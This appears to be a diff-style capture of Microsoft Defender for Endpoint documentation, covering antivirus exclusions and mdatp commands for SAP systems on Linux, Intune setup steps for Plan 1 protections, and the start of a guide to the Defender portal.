-Endpoint Detection and Response (EDR) functionality is active whenever Microsoft Defender for Endpoint on Linux is installed. There's no simple way to disable EDR functionality through command line or configuration. For more information on troubleshooting EDR, see the sections [Useful Commands](#useful-commands) and [Useful Links](#useful-links).
-
-## Important Configuration Settings for Microsoft Defender for Endpoint on SAP on Linux
-
-It's recommended to check the installation and configuration of Defender for Endpoint with the command mdatp health.
-
-The key parameters recommended for SAP applications are:
--- healthy = true-- release_ring = Production. Prerelease and insider rings shouldn't be used with SAP Applications.-- real_time_protection_enabled = false. Real-time protection is off in passive mode, which is the default mode and prevents real-time IO interception.-- automatic_definition_update_enabled = true-- definition_status = "up_to_date". Run a manual update if a new value is identified.-- edr_early_preview_enabled = "disabled". If enabled on SAP systems it might lead to system instability.-- conflicting_applications = [ ]. Other AV or security software installed on a VM such as Clam.-- supplementary_events_subsystem = "ebpf". Don't proceed if ebpf isn't displayed. Contact the security admin team.-
-This article has some useful hints on troubleshooting installation issues for Microsoft Defender for Endpoint:
-[Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux](linux-support-install.md#installation-failed)
-
-## Recommended Microsoft Defender for Endpoint Antivirus Exclusions for SAP on Linux
-
-Enterprise Security Team must obtain a full list of antivirus exclusions from the SAP Administrators (typically the SAP Basis Team).
-It's recommended to initially exclude:
--- DBMS data files, log files and temp files, including disks containing backup files-- The entire contents of the SAPMNT directory-- The entire contents of the SAPLOC directory-- The entire contents of the TRANS directory-- The entire contents of directories for standalone engines such as TREX-- Hana ΓÇô exclude /hana/shared, /hana/data, and /hana/log - see Note 1730930-- SQL Server ΓÇô [Configure antivirus software to work with SQL Server - SQL Server](/troubleshoot/sql/database-engine/security/antivirus-and-sql-server)-- Oracle ΓÇô See How To Configure Anti-Virus On Oracle Database Server (Doc ID 782354.1)-- DB2 ΓÇô [https://www.ibm.com/support/pages/which-db2-directories-exclude-linux-anti-virus-software](https://www.ibm.com/support/pages/which-db2-directories-exclude-linux-anti-virus-software)-- SAP ASE ΓÇô contact SAP-- MaxDB ΓÇô contact SAP-
-Oracle ASM systems don't need exclusions as Microsoft Defender for Endpoint can't read ASM disks.
-
-Customers with Pacemaker clusters should also configure these exclusions:
-
-```bash
-mdatp exclusion folder add --path /usr/lib/pacemaker/ (for RedHat /var/lib/pacemaker/)
-```
-
-```bash
-mdatp exclusion process add --name pacemakerd
-```
-
-```bash
-mdatp exclusion process add --name crm_*
-```
-
-Customers running the Azure Security security policy might trigger a scan using the Freeware Clam AV solution. It's recommended to disable Clam AV scan after a VM has been protected with Microsoft Defender for Endpoint using following commands:
-
-```bash
-sudo azsecd config -s clamav -d "Disabled"
-```
-
-```bash
-sudo service azsecd restart
-```
-
-```bash
-sudo azsecd status
-```
-
-The following articles detail how to configure AV exclusions for processes, files, and folders per individual VM:
--- [Set up exclusions for Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)-- [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md)-
-## Scheduling a Daily AV Scan
-
-The recommended configuration for SAP applications disables real-time interception of IO calls for AV scanning. The recommended setting is passive mode in which real_time_protection_enabled = false.
-
-The following link details how to schedule a scan: [How to schedule scans with Microsoft Defender for Endpoint (Linux)](linux-schedule-scan-mde.md).
-
-Large SAP systems might have more than 20 SAP application servers each with a connection to the SAPMNT NFS share. Twenty or more application servers simultaneously scanning the same NFS server will likely overload the NFS server. By default, Defender for Endpoint on Linux doesn't scan NFS sources.
-
-If there's a requirement to scan SAPMNT then this scan should be configured on one or two VMs only.
-
-Scheduled scans for SAP ECC, BW, CRM, SCM, Solution Manager, and other components should be staggered at different times to avoid all SAP components from overloading a shared NFS storage source shared by all SAP components.
-
-## Useful Commands
-
-If, during manual zypper installation on Suse an error "Nothing provides 'policycoreutils'" occurs, refer to:
-[Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux](linux-support-install.md).
-
-There are several command-line commands that can control the operation of mdatp. To enable passive mode, you can use the following command:
-
-```bash
-mdatp config passive-mode --value enabled
-```
-
-> [!NOTE]
-> passive mode is the default mode on installing defender for endpoint on Linux.
-
-To turn off real-time protection, you can use the command:
-
-```bash
-mdatp config real-time-protection --value disabled
-```
-
-This command tells mdatp to retrieve the latest definitions from the cloud:
-
-```bash
-mdatp definitions update
-```
-
-This command tests whether mdatp can connect to the cloud-based endpoints via the network:
-
-```bash
-mdatp connectivity test
-```
-
-These commands update the mdatp software, if needed:
-
-```bash
-yum update mdatp
-```
-
-```bash
-zypper update mdatp
-```
-
-Since mdatp runs as a linux system service, you can control mdatp using the service command, for example:
-
-```bash
-service mdatp status
-```
-
-This command creates a diagnostic file that can be uploaded to Microsoft support:
-
-```bash
-sudo mdatp diagnostic create
-```
-
-## Useful Links
--- Microsoft Endpoint Manager doesn't support Linux at this time--- [Manage Microsoft Defender for Endpoint configuration settings on devices with Microsoft Endpoint Manager](security-config-management.md)--- [Microsoft Tech Community: Microsoft Defender for Endpoint Linux - Configuration and Operation Command List](https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/microsoft-defender-for-endpoint-linux-configuration-and/ba-p/1577902)--- [Microsoft Tech Community: Deploying Microsoft Defender for Endpoint on Linux Servers](https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/deploying-microsoft-defender-for-endpoint-on-linux-servers/ba-p/1560326)--- [Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on Linux](linux-support-connectivity.md#run-the-connectivity-test)--- [Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux](linux-support-perf.md#troubleshoot-performance-issues-using-microsoft-defender-for-endpoint-client-analyzer)
security Mde P1 Setup Configuration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-p1-setup-configuration.md
- Title: Set up and configure Microsoft Defender for Endpoint Plan 1
-description: Learn how to set up and configure Defender for Endpoint Plan 1. Review the requirements, plan your rollout, and set up your environment.
------ Previously updated : 09/13/2023---- m365-security-- tier2--
-# Set up and configure Microsoft Defender for Endpoint Plan 1
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-This article describes how to set up and configure Defender for Endpoint Plan 1. Whether you have assistance or are doing it yourself, you can use this article as a guide throughout your deployment.
-
-## The setup and configuration process
--
-The general setup and configuration process for Defender for Endpoint Plan 1 is as follows: <br/><br/>
--
-| Number | Step | Description |
-|::|:|:|
-| 1 | [Review the requirements](#review-the-requirements) | Lists licensing, browser, operating system, and datacenter requirements |
-| 2 | [Plan your deployment](#plan-your-deployment) | Lists several deployment methods to consider and includes links to more resources to help you decide which method to use |
-| 3 | [Set up your tenant environment](#set-up-your-tenant-environment) | Lists tasks for setting up your tenant environment |
-| 4 | [Assign roles and permissions](#assign-roles-and-permissions) | Lists roles and permissions to consider for your security team <br/><br/>**TIP**: As soon as roles and permissions are assigned, your security team can get started using the Microsoft Defender portal. To learn more, see [Getting started](mde-plan1-getting-started.md). |
-| 5 | [Onboard to Defender for Endpoint](#onboard-to-defender-for-endpoint) | Lists several methods by operating system to onboard to Defender for Endpoint Plan 1 and includes links to more detailed information for each method |
-| 6 | [Configure next-generation protection](#configure-next-generation-protection) | Describes how to configure your next-generation protection settings in Microsoft Intune |
-| 7 | [Configure your attack surface reduction capabilities](#configure-your-attack-surface-reduction-capabilities) | Lists the types of attack surface reduction capabilities you can configure and includes procedures with links to more resources |
-
-## Review the requirements
-
-The following table lists the basic requirements for Defender for Endpoint Plan 1:<br/><br/>
-
-| Requirement | Description |
-|:|:|
-| Licensing requirements | Defender for Endpoint Plan 1 (standalone, or as part of Microsoft 365 E3 or A3) |
-| Browser requirements | Microsoft Edge <br/> Internet Explorer version 11 <br/> Google Chrome |
-| Operating systems (client) | Windows 11<br/>Windows 10, version 1709, or later<br/>[macOS](microsoft-defender-endpoint-mac.md)<br/>[iOS](microsoft-defender-endpoint-ios.md) <br/>[Android OS](microsoft-defender-endpoint-android.md) |
-| Operating systems (server) | Windows Server 2022<br/>Windows Server 2019<br/>Windows Server version 1803 and later<br/>Windows Server 2016 and 2012 R2 are supported when using the [modern unified solution](configure-server-endpoints.md#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution)<br/>[Linux Server](microsoft-defender-endpoint-linux.md) |
-| Datacenter | One of the following datacenter locations: <br/>- European Union <br/>- United Kingdom <br/>- United States |
-
-> [!NOTE]
-> The standalone version of Defender for Endpoint Plan 1 doesn't include server licenses. To onboard servers, you'll require an additional license, such as:
->
-> - Microsoft Defender for Servers Plan 1 or Plan 2 (as part of the [Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction)) offering.
-> - Microsoft Defender for Endpoint for Servers
-> - [Microsoft Defender for Business servers](../defender-business/get-defender-business.md#how-to-get-microsoft-defender-for-business-servers) (for small and medium-sized businesses)
->
-> To learn more. see [Defender for Endpoint onboarding Windows Server](onboard-windows-server.md)
-
-## Plan your deployment
-
-When you plan your deployment, you can choose from several different architectures and deployment methods. Every organization is unique, so you have several options to consider, as listed in the following table: <br/><br/>
-
-| Method | Description |
-|:|:|
-| [Intune](/mem/intune/fundamentals/what-is-intune) | Use Intune to manage endpoints in a cloud native environment |
-| [Intune](/mem/intune/fundamentals/what-is-intune) and [Configuration Manager](/mem/configmgr/core/understand/introduction) | Use Intune and Configuration Manager to manage endpoints and workloads that span an on-premises and cloud environment |
-| [Configuration Manager](/mem/configmgr/core/understand/introduction) | Use Configuration Manager to protect on-premises endpoints with the cloud-based power of Defender for Endpoint |
-| Local script downloaded from the Microsoft Defender portal | Use local scripts on endpoints to run a pilot or onboard just a few devices |
-
-To learn more about your deployment options, see [Plan your Defender for Endpoint deployment](deployment-strategy.md). And, download the following poster:
-
-[:::image type="content" source="../../medie-deployment-strategy.pdf)
-
-**[Get the deployment poster](https://download.microsoft.com/download/5/6/0/5609001f-b8ae-412f-89eb-643976f6b79c/mde-deployment-strategy.pdf)**
-
-> [!TIP]
-> For more detailed information about planning your deployment, see [Plan your Microsoft Defender for Endpoint deployment](deployment-strategy.md).
-
-## Set up your tenant environment
-
-Setting up your tenant environment includes tasks, such as:
--- Verifying your licenses-- Configuring your tenant-- Configuring your proxy settings (only if necessary)-- Making sure sensors are working correctly and reporting data to Defender for Endpoint -
-These tasks are included in the setup phase for Defender for Endpoint. See [Set up Defender for Endpoint](production-deployment.md).
-
-## Assign roles and permissions
-
-In order to access the Microsoft Defender portal, configure settings for Defender for Endpoint, or perform tasks, such as taking response actions on detected threats, appropriate permissions must be assigned. Defender for Endpoint uses [built-in roles within Microsoft Entra ID](/azure/active-directory/roles/permissions-reference).
-
-Microsoft recommends assigning users only the level of permission they need to perform their tasks. You can assign permissions by using basic permissions management, or by using [role-based access control](rbac.md) (RBAC).
--- With basic permissions management, global admins and security admins have full access, whereas security readers read-only access.-- With RBAC, you can set more granular permissions through more roles. For example, you can have security readers, security operators, security admins, endpoint administrators, and more.--
-The following table describes key roles to consider for Defender for Endpoint in your organization: <br/><br/>
-
-| Role | Description |
-|:|:|
-| Global administrators (also referred to as global admins) <br/><br/> *As a best practice, limit the number of global administrators.* | Global admins can perform all kinds of tasks. The person who signed up your company for Microsoft 365 or for Microsoft Defender for Endpoint Plan 1 is a global administrator by default. <br/><br/> Global admins are able to access/change settings across all Microsoft 365 portals, such as: <br/>- The Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com)) <br/>- Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) <br/>- Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) |
-| Security administrators (also referred to as security admins) | Security admins can perform security operator tasks plus the following tasks: <br/>- Monitor security-related policies <br/>- Manage security threats and alerts <br/>- View reports |
-| Security operator | Security operators can perform security reader tasks plus the following tasks: <br/>- View information about detected threats <br/>- Investigate and respond to detected threats |
-| Security reader | Security readers can perform the following tasks: <br/>- View security-related policies across Microsoft 365 services <br/>- View security threats and alerts <br/>- View reports |
--
-> [!TIP]
-> To learn more about roles in Microsoft Entra ID, see [Assign administrator and non-administrator roles to users with Microsoft Entra ID](/azure/active-directory/fundamentals/active-directory-users-assign-role-azure-portal). And, more information about roles for Defender for Endpoint, see [Role-based access control](prepare-deployment.md#role-based-access-control).
-
-## Onboard to Defender for Endpoint
-
-When you're ready to onboard your organization's endpoints, you can choose from several methods, as listed in the following table: <br/><br/>
-
-|Endpoint|Deployment tool|
-|||
-|**Windows**|[Local script (up to 10 devices)](configure-endpoints-script.md) <br> [Group Policy](configure-endpoints-gp.md) <br> [Microsoft Intune/ Mobile Device Manager](configure-endpoints-mdm.md) <br> [Microsoft Endpoint Configuration Manager](configure-endpoints-sccm.md) <br> [VDI scripts](configure-endpoints-vdi.md)|
-|**macOS**|[Local script](mac-install-manually.md) <br> [Microsoft Intune](mac-install-with-intune.md) <br> [JAMF Pro](mac-install-with-jamf.md) <br> [Mobile Device Management](mac-install-with-other-mdm.md)|
-|**Android**|[Microsoft Intune](android-intune.md)|
-|**iOS**|[Microsoft Intune](ios-install.md) <br> [Mobile Application Manager](ios-install-unmanaged.md) |
--
-Then, proceed to configure your next-generation protection and attack surface reduction capabilities.
-
-## Configure next-generation protection
-
-We recommend using [Intune](/mem) to manage your organization's devices and security settings, as shown in the following image:
-
-
-To configure your next-generation protection in Intune, follow these steps:
-
-1. Go to the Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) and sign in.
-
-2. Select **Endpoint security** > **Antivirus**, and then select an existing policy. (If you don't have an existing policy, create a new policy.)
-
-3. Set or change your antivirus configuration settings. Need help? Refer to the following resources: <br/>
-
- - [Settings for Windows 10 Microsoft Defender Antivirus policy in Microsoft Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-windows)
- - [Configure Defender for Endpoint on iOS features](ios-configure-features.md)
-
-4. When you're finished specifying your settings, choose **Review + save**.
-
-## Configure your attack surface reduction capabilities
-
-Attack surface reduction is all about reducing the places and ways your organization is open to attack. Defender for Endpoint Plan 1 includes several features and capabilities to help you reduce your attack surfaces across your endpoints. These features and capabilities are listed in the following table: <br/><br/>
-
-| Feature/capability | Description |
-|:|:|
-| [Attack surface reduction rules](#attack-surface-reduction-rules) | Configure attack surface reduction rules to constrain software-based risky behaviors and help keep your organization safe. Attack surface reduction rules target certain software behaviors, such as<br/>- Launching executable files and scripts that attempt to download or run files <br/>- Running obfuscated or otherwise suspicious scripts <br/>- Performing behaviors that apps don't usually initiate during normal day-to-day work <br/><br/>Such software behaviors are sometimes seen in legitimate applications. However, these behaviors are often considered risky because they're commonly abused by attackers through malware. |
-| [Ransomware mitigation](#ransomware-mitigation) | Set up ransomware mitigation by configuring controlled folder access, which helps protect your organization's valuable data from malicious apps and threats, such as ransomware. |
-| [Device control](#device-control) | Configure device control settings for your organization to allow or block removable devices (such as USB drives). |
-| [Network protection](#network-protection) | Set up network protection to prevent people in your organization from using applications that access dangerous domains or malicious content on the Internet. |
-| [Web protection](#web-protection) | Set up web threat protection to protect your organization's devices from phishing sites, exploit sites, and other untrusted or low-reputation sites. Set up web content filtering to track and regulate access to websites based on their content categories (such as Leisure, High bandwidth, Adult content, or Legal liability). |
-| [Network firewall](#network-firewall) | Configure your network firewall with rules that determine which network traffic is permitted to come into or go out from your organization's devices. |
-| [Application control](#application-control) | Configure application control rules if you want to allow only trusted applications and processes to run on your Windows devices. |
-
-### Attack surface reduction rules
-
-Attack surface reduction rules are available on devices running Windows. We recommend using Intune, as shown in the following image:
--
-1. Go to the Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) and sign in.
-
-2. Choose **Endpoint security** > **Attack surface reduction** > **+ Create policy**.
-
-3. For **Platform**, select **Windows 10 and later**.
-
-4. For **Profile**, select **Attack surface reduction rules**, and then choose **Create**.
-
-5. On the **Basics** tab, specify a name and description for the policy, and then choose **Next**.
-
-6. On the **Configuration settings** tab, expand **Attack Surface Reduction Rules**.
-
-7. Specify settings for each rule, and then choose **Next**. (For more information about what each rule does, see [Attack surface reduction rules](attack-surface-reduction.md).)
-
-8. On the **Scope tags** tab, if your organization is using scope tags, choose **+ Select scope tags**, and then select the tags you want to use. Then, choose **Next**.
-
- To learn more about scope tags, see [Use role-based access control (RBAC) and scope tags for distributed IT](/mem/intune/fundamentals/scope-tags).
-
-9. On the **Assignments** tab, specify the users and groups to whom your policy should be applied, and then choose **Next**. (To learn more about assignments, see [Assign user and device profiles in Microsoft Intune](/mem/intune/configuration/device-profile-assign).)
-
-10. On the **Review + create** tab, review the settings, and then choose **Create**.
-
-> [!TIP]
-> To learn more about attack surface reduction rules, see the following resources:
-> - [Use attack surface reduction rules to prevent malware infection](attack-surface-reduction.md)
-> - [View the list of attack surface reduction rules](attack-surface-reduction-rules-reference.md)
-> - [Attack surface reduction rules deployment Step 3: Implement attack surface reduction rules](attack-surface-reduction-rules-deployment-implement.md)
-
-### Ransomware mitigation
-
-You get ransomware mitigation through [controlled folder access](controlled-folders.md#what-is-controlled-folder-access), which allows only trusted apps to access protected folders on your endpoints.
-
-We recommend using Intune to configure controlled folder access.
--
-1. Go to the Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) and sign in.
-
-2. Select **Endpoint Security**, and then select **Attack Surface Reduction**.
-
-3. Choose **+ Create Policy**.
-
-4. For **Platform**, select **Windows 10 and later**, and for **Profile**, select **Attack surface reduction rules**. Then choose **Create**.
-
-5. On the **Basics** tab, name the policy and add a description. Select **Next**.
-
-6. On the **Configuration settings** tab, in the **Attack Surface Reduction Rules** section, scroll down to the bottom. In the **Enable folder protection** drop-down, select **Enable**. You can optionally specify these other settings:
-
- - Next to **List of additional folders that need to be protected**, select the drop-down menu, and then add folders that need to be protected.
- - Next to **List of apps that have access to protected folders**, select the drop-down menu, and then add apps that should have access to protected folders.
- - Next to **Exclude files and paths from attack surface reduction rules**, select the drop-down menu, and then add the files and paths that need to be excluded from attack surface reduction rules.
-
- Then choose **Next**.
-
-7. On the **Scope tags** tab, if your organization is using scope tags, choose **+ Select scope tags**, and then select the tags you want to use. Then, choose **Next**.
-
- To learn more about scope tags, see [Use role-based access control (RBAC) and scope tags for distributed IT](/mem/intune/fundamentals/scope-tags).
-
-8. On the **Assignments** tab, select **Add all users** and **+ Add all devices**, and then choose **Next**. (You can alternately specify specific groups of users or devices.)
-
-9. On the **Review + create** tab, review the settings for your policy, and then choose **Create**. The policy will be applied to any endpoints that were onboarded to Defender for Endpoint shortly.
-
-### Device control
-
-You can configure Defender for Endpoint to block or allow removable devices and files on removable devices. We recommend using Intune to configure your device control settings.
--
-1. Go to the Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) and sign in.
-
-2. Select **Devices** > **Configuration profiles** > **Create profile**.
-
-3. For **Platform**, select **Windows 10 and later**, and for **Profile type**, select **Templates**.
-
- Under **Template name**, select **Administrative Templates**, and then choose **Create**.
-
-4. On the **Basics** tab, name the policy and add a description. Select **Next**.
-
-5. On the **Configuration settings** tab, select **All Settings**. Then in the search box, type `Removable` to see all the settings that pertain to removable devices.
-
-6. Select an item in the list, such as **All Removable Storage classes: Deny all access**, to open its flyout pane. The flyout for each setting explains what happens when it is enabled, disabled, or not configured. Select a setting, and then choose **OK**.
-
-7. Repeat step 6 for each setting that you want to configure. Then choose **Next**.
-
-8. On the **Scope tags** tab, if your organization is using scope tags, choose **+ Select scope tags**, and then select the tags you want to use. Then, choose **Next**.
-
- To learn more about scope tags, see [Use role-based access control (RBAC) and scope tags for distributed IT](/mem/intune/fundamentals/scope-tags).
-
-9. On the **Assignments** tab, select **Add all users** and **+ Add all devices**, and then choose **Next**. (You can alternately specify specific groups of users or devices.)
-
-10. On the **Review + create** tab, review the settings for your policy, and then choose **Create**. The policy will be applied to any endpoints that were onboarded to Defender for Endpoint shortly.
-
-> [!TIP]
-> For more information, see [How to control USB devices and other removable media using Microsoft Defender for Endpoint](control-usb-devices-using-intune.md).
-
-### Network protection
-
-With network protection, you can help protect your organization against dangerous domains that might host phishing scams, exploits, and other malicious content on the Internet. We recommend using Intune to turn on network protection.
--
-1. Go to the Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) and sign in.
-
-2. Select **Devices** > **Configuration profiles** > **Create profile**.
-
-3. For **Platform**, select **Windows 10 and later**, and for **Profile type**, select **Templates**.
-
- Under **Template name**, select **Endpoint protection**, and then choose **Create**.
-
-4. On the **Basics** tab, name the policy and add a description. Select **Next**.
-
-5. On the **Configuration settings** tab, expand **Microsoft Defender Exploit Guard**, and then expand **Network filtering**.
-
- Set **Network protection** to **Enable**. (You can alternately choose **Audit** to see how network protection will work in your environment at first.)
-
- Then choose **Next**.
-
-6. On the **Assignments** tab, select **Add all users** and **+ Add all devices**, and then choose **Next**. (You can alternately specify specific groups of users or devices.)
-
-7. On the **Applicability Rules** tab, set up a rule. The profile you are configuring will be applied only to devices that meet the combined criteria you specify.
-
- For example, you might choose to assign the policy to endpoints that are running a certain OS edition only.
-
- Then choose **Next**.
-
-8. On the **Review + create** tab, review the settings for your policy, and then choose **Create**. The policy will be applied to any endpoints that were onboarded to Defender for Endpoint shortly.
-
-> [!TIP]
-> You can use other methods, such as Windows PowerShell or Group Policy, to enable network protection. To learn more, see [Turn on network protection](enable-network-protection.md).
-
-### Web protection
-
-With web protection, you can protect your organization's devices from web threats and unwanted content. Your web protection includes [web threat protection](#configure-web-threat-protection) and [web content filtering](#configure-web-content-filtering). Configure both sets of capabilities. We recommend using Intune to configure your web protection settings.
-
-#### Configure web threat protection
-
-1. Go to the Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)), and sign in.
-
-2. Choose **Endpoint security** > **Attack surface reduction**, and then choose **+ Create policy**.
-
-3. Select a platform, such as **Windows 10 and later**, select the **Web protection** profile, and then choose **Create**.
-
-4. On the **Basics** tab, specify a name and description, and then choose **Next**.
-
-5. On the **Configuration settings** tab, expand **Web Protection**, specify the settings in the following table, and then choose **Next**. <br/><br/>
-
- | Setting | Recommendation |
- |:|:|
- | **Enable network protection** | Set to **Enabled**. Prevents users from visiting malicious sites or domains. <br/><br/>Alternately, you can set network protection to **Audit mode** to see how it will work in your environment. In audit mode, network protection does not prevent users from visiting sites or domains, but it does track detections as events. |
- | **Require SmartScreen for Microsoft Edge Legacy** | Set to **Yes**. Helps protect users from potential phishing scams and malicious software. |
- | **Block malicious site access** | Set to **Yes**. Prevents users from bypassing warnings about potentially malicious sites. |
- | **Block unverified file download** | Set to **Yes**. Prevents users from bypassing the warnings and downloading unverified files. |
-
-6. On the **Scope tags** tab, if your organization is using scope tags, choose **+ Select scope tags**, and then select the tags you want to use. Then, choose **Next**.
-
- To learn more about scope tags, see [Use role-based access control (RBAC) and scope tags for distributed IT](/mem/intune/fundamentals/scope-tags).
-
-7. On the **Assignments** tab, specify the users and devices to receive the web protection policy, and then choose **Next**.
-
-8. On the **Review + create** tab, review your policy settings, and then choose **Create**.
-
-> [!TIP]
-> To learn more about web threat protection, see [Protect your organization against web threats](web-threat-protection.md).
-
-#### Configure web content filtering
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com/](https://security.microsoft.com/)) and sign in.
-
-2. Choose **Settings** > **Endpoints**.
-
-3. Under **Rules**, choose **Web content filtering**, and then choose **+ Add policy**.
-
-4. In the **Add policy** flyout, on the **General** tab, specify a name for your policy, and then choose **Next**.
-
-5. On the **Blocked categories**, select one or more categories that you want to block, and then choose **Next**.
-
-6. On the **Scope** tab, select the device groups you want to receive this policy, and then choose **Next**.
-
-7. On the **Summary** tab, review your policy settings, and then choose **Save**.
-
-> [!TIP]
-> To learn more about configuring web content filtering, see [Web content filtering](web-content-filtering.md).
-
-### Network firewall
-
-Network firewall helps reduce the risk of network security threats. Your security team can set rules that determine which traffic is permitted to flow to or from your organization's devices. We recommend using Intune to configure your network firewall.
--
-To configure basic firewall settings, follow these steps:
-
-1. Go to the Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)), and sign in.
-
-2. Choose **Endpoint security** > **Firewall**, and then choose **+ Create Policy**.
-
-3. Select a platform, such as **Windows 10 and later**, select the **Microsoft Defender Firewall** profile, and then choose **Create**.
-
-4. On the **Basics** tab, specify a name and description, and then choose **Next**.
-
-5. Expand **Microsoft Defender Firewall**, and then scroll down to the bottom of the list.
-
-6. Set each of the following settings to **Yes**:
-
- - **Turn on Microsoft Defender Firewall for domain networks**
- - **Turn on Microsoft Defender Firewall for private networks**
- - **Turn on Microsoft Defender Firewall for public networks**
-
- Review the list of settings under each of domain networks, private networks, and public networks. You can leave them set to **Not configured**, or change them to suit your organization's needs.
-
- Then choose **Next**.
-
-7. On the **Scope tags** tab, if your organization is using scope tags, choose **+ Select scope tags**, and then select the tags you want to use. Then, choose **Next**.
-
- To learn more about scope tags, see [Use role-based access control (RBAC) and scope tags for distributed IT](/mem/intune/fundamentals/scope-tags).
-
-8. On the **Assignments** tab, select **Add all users** and **+ Add all devices**, and then choose **Next**. (You can alternately specify specific groups of users or devices.)
-
-9. On the **Review + create** tab, review your policy settings, and then choose **Create**.
-
-> [!TIP]
-> Firewall settings are detailed and can seem complex. Refer to [Best practices for configuring Windows Defender Firewall](/windows/security/threat-protection/windows-firewall/best-practices-configuring).
-
-### Application control
-
-Windows Defender Application Control (WDAC) helps protect your Windows endpoints by only allowing trusted applications and processes to run. Most organizations used a phased deployment of WDAC. That is, most organizations don't roll out WDAC across all Windows endpoints at first. In fact, depending on whether your organization's Windows endpoints are fully managed, lightly managed, or "Bring Your Own Device" endpoints, you might deploy WDAC on all or some endpoints.
-
-To help with planning your WDAC deployment, see the following resources:
--- [Application Control for Windows](/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control)--- [Windows Defender Application Control policy design decisions](/windows/security/threat-protection/windows-defender-application-control/understand-windows-defender-application-control-policy-design-decisions)--- [Windows Defender Application Control deployment in different scenarios: types of devices](/windows/security/threat-protection/windows-defender-application-control/types-of-devices)-
-## Next steps
-
-Now that you have gone through the setup and configuration process, your next step is to get started using Defender for Endpoint.
--- [Get started with Defender for Endpoint Plan 1](mde-plan1-getting-started.md)
security Mde Plan1 Getting Started https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-plan1-getting-started.md
- Title: Get started with Microsoft Defender for Endpoint Plan 1
-description: Get started using Defender for Endpoint Plan 1. Learn how to use the Microsoft Defender portal, manage alerts and devices, and view reports.
---- Previously updated : 08/22/2023------ m365-security-- tier1---
-# Get started with Microsoft Defender for Endpoint Plan 1
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-The Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) enables you to view information about detected threats, manage your alerts and incidents, take any needed action on detected threats, and manage devices. The Microsoft Defender portal is where you can get started interacting with the threat protection capabilities you get with Defender for Endpoint Plan 1. The following sections describe how to get started:
--- [The Microsoft Defender portal](#the-microsoft-365-defender-portal)-- [Viewing and managing incidents & alerts](#view-and-manage-incidents--alerts)-- [Managing devices](#manage-devices)-- [Viewing reports](#view-reports)-
-<a name='the-microsoft-365-defender-portal'></a>
-
-## The Microsoft Defender portal
-
-The Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) is where you view alerts, manage devices, and view reports. When you sign into the Microsoft Defender portal, you start with the **Home** page, which resembles the following image:
--
-The Home page provides your security team with a snapshot aggregate view of alerts, device status, and threats detected. Microsoft Defender XDR is set up so that your security operations team can find the information they're looking for quickly and easily.
-
-> [!NOTE]
-> Our examples shown in this article might differ from what you see in your Microsoft Defender portal. What you see in your portal depends on your licenses and permissions. In addition, your security team can customize your organization's portal by adding, removing, and rearranging cards.
-
-### Cards highlight key information and include recommendations
-
-The Home page includes cards, such as the Active incidents card shown in the following image:
--
-The card provides you with information at a glance, along with a link or button that you can select to view more detailed information. Referring to our example Active incidents card, we can select **View all incidents** to navigate to our list of incidents.
--
-### Navigation bar makes it easy to find alerts, the Action center, and more
-
-The navigation bar on the left side of the screen enables you to move easily between incidents, alerts, the Action center, reports, and settings. The following table describes the navigation bar.<br/><br/>
-
-| Navigation bar item | Description |
-|:|:|
-| **Home** | Navigates to the Home page of the [Microsoft Defender portal](../defender/microsoft-365-security-center-mde.md). |
-| **Incidents & alerts** | Expands to show **Incidents** and **Alerts**. |
-| **Incidents & alerts** > **Incidents** | Navigates to the **Incidents** list. Incidents are created when alerts are triggered and/or threats are detected. By default, the **Incidents** list displays data for the last 30 days, with the most recent incident listed first. <br/><br/> To learn more, see [Incidents](view-incidents-queue.md). |
-| **Incidents & alerts** > **Alerts** | Navigates to the **Alerts** list (also referred to as the **Alerts queue**). Alerts are triggered when a suspicious or malicious file, process, or behavior is detected. By default, the **Alerts** list displays data for the last 30 days, with the most recent alert listed first. <br/><br/> To learn more, see [Alerts](alerts-queue.md). |
-| **Incidents & alerts** > **Email & collaboration alerts** | If your subscription includes [Microsoft Defender for Office 365](../office-365-security/mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet), alerts are generated when potential threats are detected in email and Office files. |
-| **Actions & submissions** > **Action center** | Navigates to the Action center, which tracks remediation and manual response actions. The Action center tracks activities like these: <br/>- Microsoft Defender Antivirus encounters a malicious file and then blocks/removes that file. <br/>- Your security team isolates a device.<br/>- Defender for Endpoint detects and quarantines a file. <br/><br/> To learn more, see [Action center](auto-investigation-action-center.md). |
